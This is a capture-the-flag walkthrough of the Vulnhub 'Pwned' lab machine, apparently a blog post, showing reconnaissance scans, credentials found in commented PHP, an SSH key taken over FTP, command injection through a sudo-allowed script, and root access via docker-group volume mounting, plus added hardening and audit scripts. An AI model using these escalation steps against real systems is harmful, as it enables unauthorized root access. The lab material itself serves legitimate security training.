Vulnhub Pwned: detailed walkthrough

Pwned

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.184.0/16   |   Screen View: Unique Hosts                                                                                                                                                       
                                                                                                                                                                                                                            
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                                                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                           
 192.168.56.100  08:00:27:df:e8:5f      1      60  PCS Systemtechnik GmbH                                                                                                                                                   
 192.168.56.169  08:00:27:49:f9:fc      1      60  PCS Systemtechnik GmbH     

Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.169.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.169 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-11 05:14 EST
Nmap scan report for bogon (192.168.56.169)
Host is up (0.00014s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
|   256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_  256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Pwned....!!
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:49:F9:FC (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.60 seconds
                                                                  

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ ftp 192.168.56.169        
Connected to 192.168.56.169.
220 (vsFTPd 3.0.3)
Name (192.168.56.169:kali): anonymous
530 Permission denied.
ftp: Login failed
ftp> quit
221 Goodbye.
                 

The target's FTP service does not allow anonymous login.

┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ searchsploit vsftpd 3.0.3                                  
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                             |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 3.0.3 - Remote Denial of Service                                                                                                                                                    | multiple/remote/49719.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

There is no exploitable vulnerability for vsftpd 3.0.3; the only searchsploit entry is a remote denial of service.

┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ curl http://192.168.56.169                
 <!DOCTYPE html>
<html>
<head>
<title>Pwned....!!</title>
</head>
<body>

<h1>  vanakam nanba (Hello friend) </h1>
<p></p>

<p> 
<pre>    

        A last note from Attacker :)

                   I am Annlynn. I am the hacker hacked your server with your employees but they don't know how i used them. 
                   Now they worry about this. Before finding me investigate your employees first. (LOL) then find me Boomers XD..!!

 
            </pre>
 </p>

</body>
</html> 
<!-- I forgot to add this on last note
     You are pretty smart as i thought 
     so here i left it for you 
     She sings very well. l loved it  -->
                                          
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ gobuster dir -u http://192.168.56.169 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                       
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.169
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/11 05:19:06 Starting gobuster in directory enumeration mode
===============================================================
/nothing              (Status: 301) [Size: 318] [--> http://192.168.56.169/nothing/]
/server-status        (Status: 403) [Size: 279]
/hidden_text          (Status: 301) [Size: 322] [--> http://192.168.56.169/hidden_text/]
Progress: 217242 / 220561 (98.50%)===============================================================
2022/11/11 05:19:30 Finished
===============================================================
                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ nikto -h http://192.168.56.169
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.169
+ Target Hostname:    192.168.56.169
+ Target Port:        80
+ Start Time:         2022-11-11 05:20:15 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3268: /nothing/: Directory indexing found.
+ Entry '/nothing/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Server may leak inodes via ETags, header found with file /, inode: bf9, size: 5a9c7ca4a3440, mtime: gzip
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7916 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2022-11-11 05:20:25 (GMT-5) (10 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)? n

                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ dirb http://192.168.56.169

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Nov 11 05:20:34 2022
URL_BASE: http://192.168.56.169/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.169/ ----
+ http://192.168.56.169/index.html (CODE:200|SIZE:3065)                                                                                                                                                                     
+ http://192.168.56.169/robots.txt (CODE:200|SIZE:41)                                                                                                                                                                       
+ http://192.168.56.169/server-status (CODE:403|SIZE:279)                                                                                                                                                                   
                                                                                                                                                                                                                            
-----------------
END_TIME: Fri Nov 11 05:20:35 2022
DOWNLOADED: 4612 - FOUND: 3
                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ curl http://192.168.56.169/robots.txt
# Group 1

User-agent: *
Allow: /nothing

The directories /nothing and /hidden_text are discovered.

┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ curl http://192.168.56.169/nothing   
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://192.168.56.169/nothing/">here</a>.</p>
<hr>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.169 Port 80</address>
</body></html>
                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ curl http://192.168.56.169/nothing/nothing.html
 <!DOCTYPE html>
<html>
<head>
<title>Nothing</title>
</head>
<body>

<h1>i said nothing bro </h1>
<p></p>

<!--I said nothing here. you are wasting your time i don't lie-->



</body>
</html> 

The /nothing directory and its page contain nothing of value.

┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ curl http://192.168.56.169/hidden_text/        
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /hidden_text</title>
 </head>
 <body>
<h1>Index of /hidden_text</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="secret.dic">secret.dic</a></td><td align="right">2020-07-09 18:37  </td><td align="right">211 </td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.169 Port 80</address>
</body></html>
                                                                                                                                                                                                                             
                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ curl http://192.168.56.169/hidden_text/secret.dic 
/hacked
/vanakam_nanba
/hackerman.gif 
/facebook
/whatsapp
/instagram
/pwned
/pwned.com
/pubg 
/cod
/fortnite
/youtube
/kali.org
/hacked.vuln
/users.vuln
/passwd.vuln
/pwned.vuln
/backup.vuln
/.ssh
/root
/home



Scanning the directories again with this wordlist shows that /pwned.vuln exists.

┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ curl http://192.168.56.169/pwned.vuln/
<!DOCTYPE html>
<html>
<head> 
        <title>login</title>
</head>
<body>
                <div id="main">
                        <h1> vanakam nanba. I hacked your login page too with advanced hacking method</h1>
                        <form method="POST">
                        Username <input type="text" name="username" class="text" autocomplete="off" required>
                        Password <input type="password" name="password" class="text" required>
                        <input type="submit" name="submit" id="sub">
                        </form>
                        </div>
</body>
</html>




<?php
//      if (isset($_POST['submit'])) {
//              $un=$_POST['username'];
//              $pw=$_POST['password'];
//
//      if ($un=='ftpuser' && $pw=='B0ss_B!TcH') {
//              echo "welcome"
//              exit();
// }
// else 
//      echo "Invalid creds"
// }
?>

The commented-out PHP source reveals the username ftpuser and the password B0ss_B!TcH.

Logging in to http://192.168.56.169/pwned.vuln/ with these credentials fails. Recalling the FTP service found earlier, and given that the username is ftpuser, there is good reason to believe these are the FTP credentials:

┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ ftp 192.168.56.169
Connected to 192.168.56.169.
220 (vsFTPd 3.0.3)
Name (192.168.56.169:kali): ftpuser
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||44859|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jul 10  2020 share
226 Directory send OK.
ftp> ls -alh
229 Entering Extended Passive Mode (|||40139|)
150 Here comes the directory listing.
drwxrwxrwx    3 0        0            4096 Jul 09  2020 .
drwxr-xr-x    5 0        0            4096 Jul 10  2020 ..
drwxr-xr-x    2 0        0            4096 Jul 10  2020 share
226 Directory send OK.
ftp> cd share
250 Directory successfully changed.
ftp> ls -alh
229 Entering Extended Passive Mode (|||54944|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jul 10  2020 .
drwxrwxrwx    3 0        0            4096 Jul 09  2020 ..
-rw-r--r--    1 0        0            2602 Jul 09  2020 id_rsa
-rw-r--r--    1 0        0              75 Jul 09  2020 note.txt
226 Directory send OK.
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||12539|)
150 Opening BINARY mode data connection for id_rsa (2602 bytes).
100% |********************************************************************************************************************************************************************************|  2602        4.71 MiB/s    00:00 ETA
226 Transfer complete.
2602 bytes received in 00:00 (3.24 MiB/s)
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||56397|)
150 Opening BINARY mode data connection for note.txt (75 bytes).
100% |********************************************************************************************************************************************************************************|    75      159.22 KiB/s    00:00 ETA
226 Transfer complete.
75 bytes received in 00:00 (88.88 KiB/s)
ftp> quit
221 Goodbye.
                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ ls
id_rsa  nmap_full_scan  note.txt  secret.dic
                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ cat note.txt                          

Wow you are here 

ariana won't happy about this note 

sorry ariana :( 

                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ ls
id_rsa  nmap_full_scan  note.txt  secret.dic
                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ chmod 400 id_rsa 
                                                                                                                                                                                                                             
┌──(kali㉿kali)-[~/Vulnhub/Pwned]
└─$ ssh -i id_rsa ariana@192.168.56.169
The authenticity of host '192.168.56.169 (192.168.56.169)' can't be established.
ED25519 key fingerprint is SHA256:Eu7UdscPxuaxyzophLkeILniUaKCge0R96HjWhAmpyk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.169' (ED25519) to the list of known hosts.
Linux pwned 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Jul 10 13:03:23 2020 from 192.168.18.70
ariana@pwned:~$ 

The note.txt file hints that the username is ariana, and the private key downloaded from the FTP server to the local Kali Linux machine, once its permissions are fixed, grants SSH access as that user.

It is found that /home/messenger.sh can be executed without a password:

ariana@pwned:~$ sudo -l
Matching Defaults entries for ariana on pwned:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User ariana may run the following commands on pwned:
    (selena) NOPASSWD: /home/messenger.sh

ariana@pwned:~$ cat /home/messenger.sh
#!/bin/bash

clear
echo "Welcome to linux.messenger "
                echo ""
users=$(cat /etc/passwd | grep home |  cut -d/ -f 3)
                echo ""
echo "$users"
                echo ""
read -p "Enter username to send message : " name 
                echo ""
read -p "Enter message for $name :" msg
                echo ""
echo "Sending message to $name "

$msg 2> /dev/null

                echo ""
echo "Message sent to $name :) "
                echo ""

From the script it can be seen that the second prompt reads msg and then executes it unquoted (`$msg 2> /dev/null`); entering /bin/bash at that prompt therefore yields a shell as selena.

ariana:
selena:
ftpuser:

Enter username to send message : ariana

Enter message for ariana :/bin/bash

Sending message to ariana 
id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
which python
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
selena@pwned:/home/ariana$ cd /home
selena@pwned:/home$ ls
ariana  ftpuser  messenger.sh  selena
selena@pwned:/home$ cd selena/
selena@pwned:~$ ls
selena-personal.diary  user2.txt
selena@pwned:~$ ls -alh
total 24K
drwxrwx--- 3 selena root   4.0K Jul 10  2020 .
drwxr-xr-x 5 root   root   4.0K Jul 10  2020 ..
-rw------- 1 selena selena    1 Jul 10  2020 .bash_history
drwxr-xr-x 3 selena selena 4.0K Jul  9  2020 .local
-rw-r--r-- 1 selena selena  132 Jul 10  2020 selena-personal.diary
-rw-r--r-- 1 selena selena  100 Jul 10  2020 user2.txt
selena@pwned:~$ cat user2.txt 
711fdfc6caad532815a440f7f295c176

You are near to me. you found selena too.

Try harder to catch me
selena@pwned:~$ cat selena-personal.diary 
Its Selena personal Diary :::

Today Ariana fight with me for Ajay. so i left her ssh key on FTP. now she resposible for the leak.

selena@pwned:~$ cat .bash_history 
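The root cause above is that messenger.sh expands user input as a command line. The following hardened rewrite is an added example, not the box's own script: it keeps the same two inputs (recipient and message) but treats the message strictly as data, validates the recipient against the password file, and writes the message to a spool file instead of executing it. The sample password file content, the spool directory and the function names are constructed for this example.

```shell
#!/bin/bash
# Hardened replacement for the vulnerable messenger.sh (added example, not the original).
# The original runs "$msg 2> /dev/null", executing whatever the user typed.
# Here the message is only ever passed to printf as an argument, never evaluated.

# Constructed sample /etc/passwd content so the example runs offline.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
ariana:x:1000:1000::/home/ariana:/bin/bash
selena:x:1001:1001::/home/selena:/bin/bash
ftpuser:x:1002:1002::/home/ftpuser:/usr/sbin/nologin'

# List login names whose home directory is under /home, reading the given passwd file.
# (The original used "grep home | cut -d/ -f 3", which also printed the trailing colon.)
list_home_users() {
    awk -F: '$6 ~ /^\/home\//{print $1}' "$1"
}

# Return 0 only if the name uses a safe character set AND is one of the listed users.
is_valid_recipient() {
    local name="$1" passwd_file="$2"
    case "$name" in
        ''|*[!a-z0-9_-]*) return 1 ;;   # reject empty names and anything like "/bin/bash"
    esac
    list_home_users "$passwd_file" | grep -qx -- "$name"
}

# Deliver the message by appending it to a per-user spool file (hypothetical layout).
# The message text is an argument to printf '%s', so shell metacharacters are inert.
send_message() {
    local name="$1" msg="$2" spool_dir="$3" passwd_file="$4"
    is_valid_recipient "$name" "$passwd_file" || return 1
    printf '%s\n' "$msg" >> "$spool_dir/$name.msg"
}
```

With this version, typing /bin/bash as the message simply stores the string "/bin/bash" in the recipient's spool file. Independently of the script fix, a NOPASSWD sudo rule that runs a script as another user should only exist if that script and its directory are not writable by the invoking user.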

Privilege escalation

selena is a member of the docker group. Docker commands normally need sudo because the daemon runs as root. The Docker daemon accepts commands from root and from every member of the docker group, which means that docker group membership is effectively equivalent to root access, without needing to know any password.

selena@pwned:/tmp$ id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
selena@pwned:/tmp$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
privesc             latest              09ae39f0f8fc        2 years ago         88.3MB
<none>              <none>              e13ad046d435        2 years ago         88.3MB
alpine              latest              a24bb4013296        2 years ago         5.57MB
debian              wheezy              10fcec6d95c4        3 years ago         88.3MB

selena@pwned:/tmp$ docker run -v /:/mnt -it alpine
/ # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/ # cd /root/
~ # ls -alh
total 12K    
drwx------    1 root     root        4.0K Nov 11 11:25 .
drwxr-xr-x    1 root     root        4.0K Nov 11 11:25 ..
-rw-------    1 root     root          21 Nov 11 11:25 .ash_history
~ # cd /mnt
/mnt # ls -alh
total 277K   
drwxr-xr-x   18 root     root        4.0K Jul  6  2020 .
drwxr-xr-x    1 root     root        4.0K Nov 11 11:25 ..
lrwxrwxrwx    1 root     root           7 Jul  4  2020 bin -> usr/bin
drwxr-xr-x    4 root     root        1.0K Jul  4  2020 boot
-rw-------    1 root     root      352.0K Jul  6  2020 core
drwxr-xr-x   18 root     root        3.2K Nov 11 10:11 dev
drwxr-xr-x   76 root     root        4.0K Jul 10  2020 etc
drwxr-xr-x    5 root     root        4.0K Jul 10  2020 home
lrwxrwxrwx    1 root     root          30 Jul  4  2020 initrd.img -> boot/initrd.img-4.19.0-9-amd64
lrwxrwxrwx    1 root     root          30 Jul  4  2020 initrd.img.old -> boot/initrd.img-4.19.0-9-amd64
lrwxrwxrwx    1 root     root           7 Jul  4  2020 lib -> usr/lib
lrwxrwxrwx    1 root     root           9 Jul  4  2020 lib32 -> usr/lib32
lrwxrwxrwx    1 root     root           9 Jul  4  2020 lib64 -> usr/lib64
lrwxrwxrwx    1 root     root          10 Jul  4  2020 libx32 -> usr/libx32
drwx------    2 root     root       16.0K Jul  4  2020 lost+found
drwxr-xr-x    3 root     root        4.0K Jul  4  2020 media
drwxr-xr-x    2 root     root        4.0K Jul  4  2020 mnt
drwxr-xr-x    3 root     root        4.0K Jul  6  2020 opt
dr-xr-xr-x   94 root     root           0 Nov 11 10:11 proc
drwx------    3 root     root        4.0K Jul 10  2020 root
drwxr-xr-x   21 root     root         680 Nov 11 11:05 run
lrwxrwxrwx    1 root     root           8 Jul  4  2020 sbin -> usr/sbin
drwxr-xr-x    3 root     root        4.0K Jul  9  2020 srv
dr-xr-xr-x   13 root     root           0 Nov 11 10:11 sys
drwxrwxrwt    9 root     root        4.0K Nov 11 11:25 tmp
drwxr-xr-x   13 root     root        4.0K Jul  4  2020 usr
drwxr-xr-x   12 root     root        4.0K Jul  4  2020 var
lrwxrwxrwx    1 root     root          27 Jul  4  2020 vmlinuz -> boot/vmlinuz-4.19.0-9-amd64
lrwxrwxrwx    1 root     root          27 Jul  4  2020 vmlinuz.old -> boot/vmlinuz-4.19.0-9-amd64
/mnt # cd root
/mnt/root # ls -alh
total 28K    
drwx------    3 root     root        4.0K Jul 10  2020 .
drwxr-xr-x   18 root     root        4.0K Jul  6  2020 ..
-rw-------    1 root     root         292 Jul 10  2020 .bash_history
-rw-r--r--    1 root     root         601 Jul  6  2020 .bashrc
drwxr-xr-x    3 root     root        4.0K Jul  4  2020 .local
-rw-r--r--    1 root     root         148 Aug 17  2015 .profile
-rw-r--r--    1 root     root         429 Jul 10  2020 root.txt
/mnt/root # cat root.txt
4d4098d64e163d2726959455d046fd7c



You found me. i dont't expect this (◎ . ◎)

I am Ajay (Annlynn) i hacked your server left and this for you.

I trapped Ariana and Selena to takeover your server :)


You Pwned the Pwned congratulations :)

share the screen shot or flags to given contact details for confirmation 

Telegram   https://t.me/joinchat/NGcyGxOl5slf7_Xt0kTr7g

Instgarm   ajs_walker 

Twitter    Ajs_walker 
/mnt/root # 


The -v flag creates a volume for the container, mapping the host's / root directory to /mnt inside the container. The -it flag drops straight into an interactive shell after the command runs instead of leaving the container in the background. After running the command, cd into /mnt and every file under the host's root directory is visible.
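Both the docker-group paragraph above and the -v explanation come down to the same audit point for a defender: any non-root member of the docker group can mount the host filesystem as root. The following helper is an added example, not part of the original writeup; it reads group-file content (a constructed sample mirroring the box, where selena is in docker) and reports members of groups that are commonly root-equivalent. The group list and function names are assumptions for this example.

```shell
#!/bin/bash
# Added example: audit /etc/group-style content for root-equivalent group membership.
# Constructed sample /etc/group content mirroring the box (selena is gid 115 docker).
SAMPLE_GROUP='root:x:0:
sudo:x:27:
docker:x:115:selena
ariana:x:1000:
selena:x:1001:'

# Print the members of the named group, one per line, from the given group file.
group_members() {
    local group="$1" file="$2"
    awk -F: -v g="$group" '
        $1 == g {
            n = split($4, m, ",")
            for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
        }' "$file"
}

# Report groups that grant root-equivalent access and have members.
# Returns 1 if any such membership was found, 0 if the file is clean.
# The list of groups is an assumption for this example (docker, lxd and disk are
# well-known escalation paths; sudo and wheel are intended admin groups worth reviewing).
audit_root_equivalent_groups() {
    local file="$1" found=0 g members
    for g in docker lxd disk sudo wheel; do
        members=$(group_members "$g" "$file")
        if [ -n "$members" ]; then
            printf 'WARNING: group %s grants root-equivalent access; members: %s\n' \
                "$g" "$(printf '%s' "$members" | tr '\n' ' ')"
            found=1
        fi
    done
    return "$found"
}
```

Run it against the live file with `audit_root_equivalent_groups /etc/group`. The mitigation for the case on this box is to remove the user from the docker group (`gpasswd -d selena docker`) and to grant container access through sudo rules or Docker's rootless mode instead, so that the ability to run containers no longer implies the ability to mount the host's / as root.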

Privilege escalation successful!!!

posted @ 2022-11-11 19:42 Jason_huawen